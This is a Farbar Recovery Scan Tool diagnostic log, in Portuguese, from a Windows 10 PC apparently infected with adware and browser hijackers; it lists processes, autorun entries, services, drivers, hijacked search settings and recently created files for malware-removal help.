Addition.txt

Document joint : FBlnH5acYTw_Addition.txt

Cliquez pour partager vos propres fichiers

Commentaire : Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão:07-02-2016 Executado por Maollo (administrador) em MAOLLO-PC (11-02-2016 11:29:36) Executando a partir de C:\Users\Maollo\Downloads Perfis Carregados: Maollo (Perfis Disponíveis: Maollo & DefaultAppPool) Platform: Windows 10 Pro Versão 1511 (X64) Idioma: Português (Brasil) Internet Explorer Versão 11 (Navegador padrão: Chrome) Modo da Inicialização: Normal Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processos (Whitelisted) ================= (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.) (QIHU 360 SOFTWARE CO. LIMITED) C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe (DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe (Qihu Software Co. Limited) C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe (QIHU 360 SOFTWARE CO. LIMITED) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.10\deploy\LoLLauncher.exe () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\LoLPatcher.exe () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\LolClient.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe () C:\Windows\nci.exe () C:\Windows\mnci.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe () C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.PurBrowse64.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registro (Whitelisted) =========================== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.) HKLM-x32\...\Run: [QHSafeTray] => C:\Program Files (x86)\360\Total Security\safemon\360Tray.exe [305272 2015-12-11] (QIHU 360 SOFTWARE CO. LIMITED) HKLM-x32\...\Run: [LightGate] => c:\programdata\21383\lightgate.exe [1081344 2015-12-04] () HKLM-x32\...\Run: [HomePageHelper] => c:\programdata\11973\homepage.exe [1100288 2015-11-25] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation) HKLM-x32\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [-] => C:\ProgramData\00781\msiql.exe [2412032 2016-01-14] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [taskhost] => rundll32.exe C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll Start /DEFAULT HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [Pritc] => c:\programdata\windows update\tmp\msdtc-.exe [2980352 2016-01-08] (VLOME) HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\osmsg.exe [1905664 2016-01-16] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [msiql] => C:\ProgramData\04200\msiql.exe [2415616 2016-01-26] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-18\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10638\jsdrv.exe HKU\S-1-5-18\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-18\...\Run: [Gameo] => C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Gameo\gameo.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Gameo\gameo.dat" mode:minimized HKU\S-1-5-18\...\Run: [Pritc] => c:\programdata\windows update\tmp\msdtc-.exe [2980352 2016-01-08] (VLOME) GroupPolicy: Restrição - Chrome <======= ATENÇÃO CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO ==================== Internet (Whitelisted) ==================== (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.) Winsock: Catalog9-x64 01 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 02 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 03 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 04 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 05 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{53c83f7d-ebc0-4abe-a10d-aa15a56f967f}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: [NameServer] 104.197.191.4 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = search.mpc.am HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystart.com/?pr=vmn&id=mystarttb&v=5_5&ent=hp_5153&src=5153 HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 SearchScopes: HKLM -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKLM -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKLM-x32 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?gen=ms&pr=vmn&id=mystarttb&v=5_5&ent=ch_5153&q={searchTerms} SearchScopes: HKU\.DEFAULT -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?gen=ms&pr=vmn&id=mystarttb&v=5_5&ent=ch_5153&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> OldSearch URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> {811C5DC1-F05B-4D62-AE1F-5520656C288C} URL = hxxps://br.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=435371&p={searchTerms} BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation) BHO: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon64.dll [2015-12-11] (Qihu 360 Software Co., Ltd.) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\ssv.dll [2016-01-30] (Oracle Corporation) BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation) BHO-x32: Primary Color 1.0.0.7 -> {b0a28f54-b08f-4049-a9bf-8d33bd1e9222} -> C:\Program Files (x86)\Primary Color\PrimaryColorbho.dll [2015-12-21] (Primary Color) BHO-x32: PriceFountain -> {b608cc98-54de-4775-96c9-097de398500c} -> C:\WINDOWS\SysWow64\config\systemprofile\AppData\Local\PriceFountain\PriceFountainIE.dll [2015-06-18] () BHO-x32: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon.dll [2015-12-11] (Qihu 360 Software Co., Ltd.) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-30] (Oracle Corporation) Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation) FireFox: ======== FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-10-20] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-10-20] () FF Plugin-x32: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-30] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-30] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.) FF HKLM\...\Firefox\Extensions: [{71D41604-39D5-4834-8377-4BF8AFDE7499}] - C:\Program Files\shopperz311220151509\Firefox\{71D41604-39D5-4834-8377-4BF8AFDE7499}.xpi => não encontrado (a) FF HKLM\...\Firefox\Extensions: [{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}] - C:\Program Files\groover040120161227\Firefox\{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}.xpi => não encontrado (a) FF HKLM-x32\...\Firefox\Extensions: [{71D41604-39D5-4834-8377-4BF8AFDE7499}] - C:\Program Files\shopperz311220151509\Firefox\{71D41604-39D5-4834-8377-4BF8AFDE7499}.xpi => não encontrado (a) FF HKLM-x32\...\Firefox\Extensions: [{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}] - C:\Program Files\groover040120161227\Firefox\{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}.xpi => não encontrado (a) Chrome: ======= CHR DefaultSearchURL: Default -> hxxps://mystart.com/default-search/rsc001__moss__org103__103_55f20019a6fde1d80a7b23c6__2_4_5__moc__nt__yr/?q={searchTerms} CHR DefaultSearchKeyword: Default -> yahoo CHR Profile: C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Apresentações) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-04] CHR Extension: (Google Docs) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-04] CHR Extension: (Google Drive) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-04] CHR Extension: (YouTube) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-04] CHR Extension: (Google Search) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-04] CHR Extension: (Planilhas do Google) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-04] CHR Extension: (Documentos Google off-line) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-02-04] CHR Extension: (Skype) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-02-04] CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-04] CHR Extension: (Gmail) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-04] CHR HKLM-x32\...\Chrome\Extension: [ijepgjdjkdbopbnaopmlmobimmhjklhd] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12] ==================== Serviços (Whitelisted) ======================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [437880 2015-10-08] (BlueStack Systems, Inc.) S2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [417400 2015-10-08] (BlueStack Systems, Inc.) S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [855672 2015-10-08] (BlueStack Systems, Inc.) S3 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation) S3 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation) S3 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155192 2015-08-26] (NVIDIA Corporation) S2 GoogleChromeUpService; C:\ProgramData\upgsvr.exe [1747968 2015-12-28] () [Arquivo não assinado] S2 GoogleChromeUpSvc; C:\ProgramData\Windows Update\svrupg.exe [2786816 2016-01-17] (TODO: ) [Arquivo não assinado] S3 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [24888 2015-07-26] (Hewlett-Packard Company) R2 mnci; c:\windows\mnci.exe [408576 2016-02-03] () [Arquivo não assinado] R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-01-28] (DotC United Inc) S2 MustangService_2015_10_10; C:\ProgramData\TempMoudleSet\MustangSer2033.exe [235776 2015-12-15] (MustangService) R2 nci; c:\windows\nci.exe [417792 2016-02-03] () [Arquivo não assinado] S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3758336 2015-11-29] (INCA Internet Co., Ltd.) S3 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1873696 2015-10-12] (NVIDIA Corporation) S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544568 2015-08-26] (NVIDIA Corporation) S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [1009392 2016-01-20] (Overwolf LTD) R2 QHActiveDefense; C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe [903288 2015-12-11] (QIHU 360 SOFTWARE CO. LIMITED) S3 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-04] () S2 TheCalendarService; C:\Program Files (x86)\CalendarTool\2.0.0.11189\CalendarServ.exe [141960 2015-12-25] () R2 Update Primary Color; C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe [662952 2016-02-11] () S2 update_service; C:\Program Files (x86)\updateservice\updateservice.exe [23552 2016-01-20] () [Arquivo não assinado] R2 Util Primary Color; C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe [662952 2016-02-11] () S2 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies, Inc.) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation) ===================== Drivers (Whitelisted) ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) S3 360AntiHacker; C:\Windows\System32\Drivers\360AntiHacker64.sys [137808 2015-11-12] (360.cn) R3 360AvFlt; C:\Windows\System32\DRIVERS\360AvFlt.sys [77904 2015-12-11] (360.cn) R3 360AvFlt; C:\Windows\SysWOW64\DRIVERS\360AvFlt.sys [77904 2015-12-11] (360.cn) R1 360Box64; C:\Windows\System32\DRIVERS\360Box64.sys [319568 2015-12-11] (360.cn) S3 360Camera; C:\Windows\System32\Drivers\360Camera64.sys [40520 2015-11-12] (360.cn) R1 360FsFlt; C:\Windows\System32\DRIVERS\360FsFlt.sys [367696 2015-11-12] (360.cn) R1 BAPIDRV; C:\Windows\System32\DRIVERS\BAPIDRV64.sys [181328 2015-12-11] (360.cn) S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [146040 2015-10-08] (BlueStack Systems) R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-01-18] (DotC United Inc) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19576 2015-08-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [50472 2015-08-11] (NVIDIA Corporation) R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek ) R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2015-09-22] (Razer, Inc.) R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.) S3 tsusbhub; C:\Windows\System32\drivers\tsusbhub.sys [117248 2010-11-20] (Microsoft Corporation) [Arquivo não assinado] S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation) R1 {0da991e7-651e-44f2-a8d8-99c28d929208}Gw64; C:\Windows\System32\drivers\{0da991e7-651e-44f2-a8d8-99c28d929208}Gw64.sys [48456 2016-02-09] (StdLib) R1 {10593385-12ca-4697-8245-47ada7c055d9}Gw64; C:\Windows\System32\drivers\{10593385-12ca-4697-8245-47ada7c055d9}Gw64.sys [48456 2016-01-27] (StdLib) R1 {14399205-100e-435b-93e2-9f4ebefe8918}Gw64; C:\Windows\System32\drivers\{14399205-100e-435b-93e2-9f4ebefe8918}Gw64.sys [48456 2016-01-28] (StdLib) R1 {54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64; C:\Windows\System32\drivers\{54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64.sys [48456 2016-02-06] (StdLib) R1 {5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64; C:\Windows\System32\drivers\{5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64.sys [48456 2016-02-05] (StdLib) U3 idsvc; não ImagePath U3 wpcsvc; não ImagePath ==================== NetSvcs (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Um Mês Criados arquivos e pastas ======== (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 2016-02-11 11:29 - 2016-02-11 11:30 - 00021467 _____ C:\Users\Maollo\Downloads\FRST.txt 2016-02-11 11:29 - 2016-02-11 11:29 - 00000000 ____D C:\FRST 2016-02-11 11:28 - 2016-02-11 11:28 - 02370560 _____ (Farbar) C:\Users\Maollo\Downloads\FRST64.exe 2016-02-11 10:31 - 2016-02-11 10:31 - 00000000 ____D C:\Users\Todos os Usuários\NortonInstaller 2016-02-11 10:31 - 2016-02-11 10:31 - 00000000 ____D C:\ProgramData\NortonInstaller 2016-02-11 10:23 - 2016-02-11 10:28 - 00000000 ____D C:\Program Files (x86)\YTDownloader 2016-02-11 10:22 - 2016-02-11 10:22 - 00000000 ____D C:\Program Files (x86)\ShopperPro3 2016-02-11 10:22 - 2016-02-11 10:22 - 00000000 ____D C:\Program Files (x86)\MixVideoPlayer 2016-02-11 10:21 - 2016-02-11 10:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC 2016-02-11 10:20 - 2016-02-11 10:21 - 00000000 ____D C:\Users\Todos os Usuários\11973 2016-02-11 10:20 - 2016-02-11 10:21 - 00000000 ____D C:\ProgramData\11973 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\21383 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\18769 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\21383 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\18769 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Program Files (x86)\CalendarTool 2016-02-11 10:19 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\23996 2016-02-11 10:19 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\23996 2016-02-10 10:17 - 2016-01-27 03:56 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-02-10 10:17 - 2016-01-27 03:55 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-02-10 10:17 - 2016-01-27 03:45 - 06605544 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-02-10 10:17 - 2016-01-27 03:37 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2016-02-10 10:17 - 2016-01-27 03:10 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-02-10 10:17 - 2016-01-27 03:05 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-02-10 10:17 - 2016-01-27 03:05 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-02-10 10:17 - 2016-01-27 03:04 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-02-10 10:17 - 2016-01-27 02:58 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2016-02-10 10:17 - 2016-01-27 02:55 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-02-10 10:17 - 2016-01-27 02:54 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-02-10 10:17 - 2016-01-27 02:48 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-02-10 10:17 - 2016-01-27 02:41 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-02-10 10:16 - 2016-01-29 04:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2016-02-10 10:16 - 2016-01-29 04:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2016-02-10 10:16 - 2016-01-27 04:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-02-10 10:16 - 2016-01-27 04:15 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-02-10 10:16 - 2016-01-27 04:01 - 07476064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-02-10 10:16 - 2016-01-27 04:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-02-10 10:16 - 2016-01-27 04:01 - 01819720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-02-10 10:16 - 2016-01-27 03:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-02-10 10:16 - 2016-01-27 03:57 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-02-10 10:16 - 2016-01-27 03:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2016-02-10 10:16 - 2016-01-27 03:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-02-10 10:16 - 2016-01-27 03:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe 2016-02-10 10:16 - 2016-01-27 03:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-02-10 10:16 - 2016-01-27 03:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2016-02-10 10:16 - 2016-01-27 03:46 - 01270072 _____ (Microsoft Corporation) 